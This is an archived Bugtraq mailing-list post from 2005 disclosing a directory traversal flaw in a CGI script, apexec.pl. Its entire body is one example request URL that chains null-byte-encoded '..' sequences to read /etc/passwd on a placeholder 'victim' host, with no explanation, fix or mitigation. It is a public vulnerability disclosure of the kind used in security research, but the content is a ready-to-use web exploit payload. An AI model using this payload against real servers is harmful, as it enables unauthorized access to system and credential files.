[38438] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Directoy Traversal Attack in apexec.pl (.%00./-Bug)

daemon@ATHENA.MIT.EDU (msdarkflyer@linuxmail.org)
Tue Apr 19 14:22:02 2005

Date: 19 Apr 2005 12:57:48 -0000
Message-ID: <20050419125748.6225.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: <msdarkflyer@linuxmail.org>
To: bugtraq@securityfocus.com



Example:

www.victim.com/cgi-bin/apexec.pl?template=.%00./.%00./.%00./.%00./.%00./.%00./etc/passwd%%0000.html

Greetz MSDarkflyer
--

home	help	back	first	fref	pref	prev	next	nref	lref	last	post